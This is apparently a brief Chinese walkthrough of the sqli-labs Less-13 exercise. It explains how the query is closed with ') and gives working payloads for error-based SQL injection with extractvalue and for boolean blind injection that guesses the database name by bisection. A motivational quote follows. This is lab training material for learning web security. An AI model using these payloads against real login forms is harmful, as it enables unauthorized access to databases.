LESS-13
LESS-13 源碼: 輸入:admin’,出現錯誤提示,可以知道sql注入中是用’)閉合。 輸入:admin’)# 因爲這裏有報錯,所以可以用報錯注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布爾注入: admin’) and left(database(),1)>‘a’#(可以用二分法進行猜測)
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
